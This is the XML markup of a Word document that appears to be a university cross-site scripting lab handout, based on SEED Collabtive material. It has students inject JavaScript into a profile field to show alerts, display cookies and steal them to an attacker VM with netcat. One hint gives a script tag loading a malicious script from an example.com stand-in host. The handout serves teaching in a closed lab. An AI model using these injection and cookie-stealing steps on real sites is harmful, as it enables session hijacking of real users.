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4EDD" w:rsidRPr="00064EDD" w:rsidRDefault="00064EDD" w:rsidP="00064EDD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00064EDD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS) Attack Lab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615E00" w:rsidRDefault="00064EDD" w:rsidP="00064EDD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00064EDD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>(Web Application: Collab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2A3829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</w:t>
            </w:r>
            <w:r w:rsidR="002A38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ased on the lab material: </w:t>
            </w:r>
            <w:hyperlink r:id="rId8" w:history="1">
              <w:r w:rsidR="002A3829" w:rsidRPr="00C027B6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:eastAsiaTheme="minorEastAsia" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:lang w:eastAsia="zh-CN"/>
                </w:rPr>
                <w:t>http://www.cis.syr.edu/~wedu/seed/Labs/Web/XSS_Collabtive/XSS_Collabtive.pdf</w:t>
              </w:r>
            </w:hyperlink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mments and suggestions can be sent to wxu@bowiestate.edu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009801A3" w:rsidRPr="00EB2649" w:rsidRDefault="00A6328A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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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E33735" w:rsidRDefault="007A05CC" w:rsidP="00E3373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E33735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874767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seedubuntu. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A05CC" w:rsidRPr="00977144" w:rsidRDefault="007A05CC" w:rsidP="007A05CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440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Note: Ubuntu does not allow root to login directly from the login window. You have to login as a normal user, and then use the command su to login to the root account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D072E1" w:rsidRPr="00E33735" w:rsidRDefault="007A05CC" w:rsidP="00E33735">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:num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User ID: seed, Password: dees</w:t>
      </w:r>
      <w:r w:rsidR="00A6328A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D072E1" w:rsidRPr="00527399" w:rsidRDefault="00D072E1" w:rsidP="00E3373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D072E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>In this lab, we need three things, are of which are already installed in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the provided VM image: (1) the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D072E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Firefox web browser, (2) the Apache web server, and (3) the Collabtive proj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ect management web application. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D072E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>For the browser, we need to use the LiveHTTPHeaders exten</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">sion for Firefox to inspect the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D072E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>HTTP requests and responses. The pre-built Ubuntu VM image provided t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">o you has already installed the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D072E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Firefox web browser with the required extensions.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D072E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:cr/>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A05CC" w:rsidRDefault="005A3F25" w:rsidP="005A3F25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5A3F25"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1: Posting a Malicious Message to D</w:t>
      </w:r>
      <w:r w:rsidR="00C411A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>isplay an Alert Window</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C411A5" w:rsidRPr="003E5BC0" w:rsidRDefault="003E5BC0" w:rsidP="003E5BC0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The task is to e</w:t>
      </w:r>
      <w:r w:rsidR="00C411A5" w:rsidRPr="003E5BC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>mbed a JavaScript program in your Collabtive profile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB03C3" w:rsidRPr="00B94FA8" w:rsidRDefault="00CB03C3" w:rsidP="003E5BC0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bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5CDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Starting the</w:t>
      </w:r>
      <w:r w:rsidR="007A5CDC" w:rsidRPr="007A5CDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apache Server</w:t>
      </w:r>
      <w:r w:rsidR="00B94FA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FA8" w:rsidRDefault="00B94FA8" w:rsidP="00B94FA8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6C7B88BD" wp14:editId="6EF15996">
            <wp:extent cx="3119377" cy="526477"/>
            <wp:effectExtent l="0" t="0" r="508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51775" cy="54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5BC0" w:rsidRPr="003E5BC0" w:rsidRDefault="003E5BC0" w:rsidP="003E5BC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5CDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Starting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>web site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C411A5" w:rsidRPr="00977144" w:rsidRDefault="00874C7E" w:rsidP="003E5BC0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091992B1" wp14:editId="4EC8C4D8">
            <wp:extent cx="5091568" cy="1956121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171" cy="19701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05CC" w:rsidRPr="00FC0070" w:rsidRDefault="00225EC8" w:rsidP="00225EC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225EC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Login as one of the users: username: </w:t>
      </w:r>
      <w:r w:rsidRPr="0038501E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>alice</w:t>
      </w:r>
      <w:r w:rsidRPr="00225EC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> password: </w:t>
      </w:r>
      <w:r w:rsidRPr="0038501E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>alice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC0070" w:rsidRPr="00FC0070" w:rsidRDefault="00FC0070" w:rsidP="00225EC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FC0070">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Edit profile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC0070" w:rsidRPr="00FC0070" w:rsidRDefault="00FC0070" w:rsidP="00FC0070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FC0070">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Click</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000F48DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC0070" w:rsidRDefault="00FC0070" w:rsidP="00FC0070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77497F5" wp14:editId="5A679389">
            <wp:extent cx="5335929" cy="40931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9425" cy="419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90D" w:rsidRPr="00DA3249" w:rsidRDefault="000F48DB" w:rsidP="00DA324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</w:t>
      </w:r>
      <w:r w:rsidRPr="000F48DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Edit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA3249" w:rsidRPr="00DA3249" w:rsidRDefault="00DA3249" w:rsidP="00DA324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 w:rsidRPr="00DA3249">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Type script as follows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA3249" w:rsidRDefault="00DA3249" w:rsidP="00DA3249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16B685C" wp14:editId="2289827E">
            <wp:extent cx="4381018" cy="1234268"/>
            <wp:effectExtent l="0" t="0" r="63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3975" cy="1237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3249" w:rsidRDefault="00DA3249" w:rsidP="00DA324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</w:t>
      </w:r>
      <w:r w:rsidR="00F40F3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Send</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA3249" w:rsidRDefault="00DA3249" w:rsidP="00DA3249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3362C93" wp14:editId="5A3C516C">
            <wp:extent cx="4103225" cy="158561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9535" cy="1591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6A79" w:rsidRDefault="002D6A79" w:rsidP="002D6A79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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: T</w:t>
      </w:r>
      <w:r w:rsidRPr="002D6A79">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">he JavaScript code is short enough to be typed into the company field. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>What i</w:t>
      </w:r>
      <w:r w:rsidRPr="002D6A79">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>f you want to run a long JavaScript, but you are limited by the number of char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>acters you can type in the form?</w:t>
      </w:r>
      <w:r w:rsidR="00E606BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hints:</w:t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573CE1" w:rsidTr="00573CE1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8545" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00573CE1" w:rsidRPr="00573CE1" w:rsidRDefault="00573CE1" w:rsidP="00573CE1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00573CE1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>&lt;script type="text/javascript"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00573CE1" w:rsidRPr="00573CE1" w:rsidRDefault="00E07DB3" w:rsidP="00573C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</w:t>
            </w:r>
            <w:r w:rsidR="00573CE1" w:rsidRPr="00573CE1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>src="</w:t>
            </w:r>
            <w:r w:rsidR="0079313F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>http://www.example.com/maliciousScript</w:t>
            </w:r>
            <w:r w:rsidR="00573CE1" w:rsidRPr="00573CE1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>.js"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00573CE1" w:rsidRDefault="00E07DB3" w:rsidP="00573C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&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00573CE1" w:rsidRPr="00573CE1" w:rsidRDefault="00573CE1" w:rsidP="00573CE1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF011F" w:rsidRDefault="00EF011F" w:rsidP="00DA3249">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D5AFE" w:rsidRDefault="007D5AFE" w:rsidP="00EF011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7D5AFE" w:rsidRDefault="007D5AFE" w:rsidP="00EF011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7D5AFE" w:rsidRDefault="007D5AFE" w:rsidP="00EF011F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:rsidR="00EF011F" w:rsidRDefault="00EF011F" w:rsidP="00EF011F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF011F"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Task 2: Posting a Malicious Message to Display Cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF011F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:cr/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E059D0" w:rsidRPr="00E059D0" w:rsidRDefault="00E059D0" w:rsidP="00E059D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ke sure you have logged on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F40F3D" w:rsidRPr="00E059D0" w:rsidRDefault="00E059D0" w:rsidP="00EF011F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E059D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Type script as follows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F40F3D" w:rsidRDefault="00F40F3D" w:rsidP="00EF011F">
      <w:pPr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6D6F8ADF" wp14:editId="0D005EC7">
            <wp:extent cx="5943600" cy="17995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0F3D" w:rsidRDefault="00E059D0" w:rsidP="00E059D0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ick </w:t>
      </w:r>
      <w:r w:rsidRPr="00E059D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Send</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F40F3D" w:rsidRDefault="00F40F3D" w:rsidP="00B3207B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6307EBC6" wp14:editId="2A478DB8">
            <wp:extent cx="4572000" cy="1784838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4592" cy="179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855" w:rsidRDefault="00344855" w:rsidP="00344855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:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00344855" w:rsidRDefault="00344855" w:rsidP="0050513B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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Cookie?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00344855" w:rsidRDefault="00344855" w:rsidP="0050513B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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y does a website need cookies?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027275F" w:rsidRDefault="0027275F" w:rsidP="0050513B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2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y is the security implication if someone steals you cookies?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D26F31" w:rsidRDefault="00BB626F" w:rsidP="00D26F3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26F31" w:rsidRDefault="00D26F31" w:rsidP="00D26F31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D26F31"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>Task 3: Stealing Cookies from the Victim’s Machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A0DD3" w:rsidRDefault="008A0DD3" w:rsidP="00BA255B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ole playing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF3871" w:rsidRDefault="00DF6DB0" w:rsidP="008A0DD3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one</w:t>
      </w:r>
      <w:r w:rsidR="00BA255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</w:t>
      </w:r>
      <w:r w:rsidR="00515042">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00515042">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Seed Ubuntu </w:t>
      </w:r>
      <w:r w:rsidR="00515042">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>virtual image</w:t>
      </w:r>
      <w:r w:rsidR="00D51BF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA255B" w:rsidRDefault="00D51BF3" w:rsidP="00AF3871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e the </w:t>
      </w:r>
      <w:r w:rsidR="00DF6DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">cloned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>virtual image</w:t>
      </w:r>
      <w:r w:rsidR="00515042">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA255B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>as the attacker’s machine</w:t>
      </w:r>
      <w:r w:rsidR="008A0DD3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> collect</w:t>
      </w:r>
      <w:r w:rsidR="00BA180E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="008A0DD3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the stolen cookies</w:t>
      </w:r>
      <w:r w:rsidR="00BA255B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6DB0" w:rsidRDefault="00DB684A" w:rsidP="003012F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ice is an attacker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703583" w:rsidRDefault="00703583" w:rsidP="003012F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figure the network of the cloned image</w:t>
      </w:r>
      <w:r w:rsidR="00225BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the same as the original image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A3DE9" w:rsidRPr="003012FA" w:rsidRDefault="005A3DE9" w:rsidP="003012F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ing two </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> systems each other to make sure they can communicate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6DB0" w:rsidRPr="00DF6DB0" w:rsidRDefault="00DF6DB0" w:rsidP="003012FA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8406989" wp14:editId="498D56A4">
            <wp:extent cx="1881886" cy="2131971"/>
            <wp:effectExtent l="0" t="0" r="444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r="65517" b="30551"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1902096" cy="21548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0DD3" w:rsidRDefault="008A0DD3" w:rsidP="008A0DD3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</w:t>
      </w:r>
      <w:r w:rsidR="0051265D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">original </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Seed Ubuntu to access the </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="00185B5F" w:rsidRPr="00A323C3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>www.xsslabcollabtive.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00185B5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> for both attacker and victim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB684A" w:rsidRDefault="00DB684A" w:rsidP="00DB684A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b is a victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA255B" w:rsidRPr="009B01D0" w:rsidRDefault="00BA255B" w:rsidP="00D26F3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BA255B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Find IP address of the attacker’s machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA255B" w:rsidRDefault="006A7025" w:rsidP="009B01D0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7447E53D" wp14:editId="76832838">
            <wp:extent cx="4288420" cy="1201316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24233" cy="1211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4D4C" w:rsidRDefault="00394D4C" w:rsidP="00394D4C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 w:rsidRPr="00394D4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Check the availability of the attacker’s machine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. If you can’t see the screen like this, you need to troubleshoot your network sett</w:t>
      </w:r>
      <w:r w:rsidR="004338D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0043327C" w:rsidRDefault="0043327C" w:rsidP="0043327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the attacker’s machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0043327C" w:rsidRDefault="0043327C" w:rsidP="0043327C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529FFCE6" wp14:editId="1A42D2BB">
            <wp:extent cx="4120587" cy="362312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94586" cy="37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327C" w:rsidRPr="0043327C" w:rsidRDefault="0043327C" w:rsidP="0043327C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 victim’s machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00394D4C" w:rsidRDefault="00B229A4" w:rsidP="00394D4C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1478AD37" wp14:editId="1C4F30A7">
            <wp:extent cx="4612511" cy="277441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58764" cy="292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3E04" w:rsidRDefault="00D43E04" w:rsidP="008038ED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Question: What does the command netcat do? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB684A" w:rsidRDefault="008B7BEA" w:rsidP="008B7BEA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mbed JavaScript code in the website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B7BEA" w:rsidRDefault="008038ED" w:rsidP="008B7BEA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lice logs on </w:t>
      </w:r>
      <w:r w:rsidR="008B7BEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Seed Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1A96" w:rsidRDefault="008B7BEA" w:rsidP="00DB1A96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ice injects the JavaScript code into the </w:t>
      </w:r>
      <w:r w:rsidR="00304B1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Company </w:t>
      </w:r>
      <w:r>
        <w:rPr>
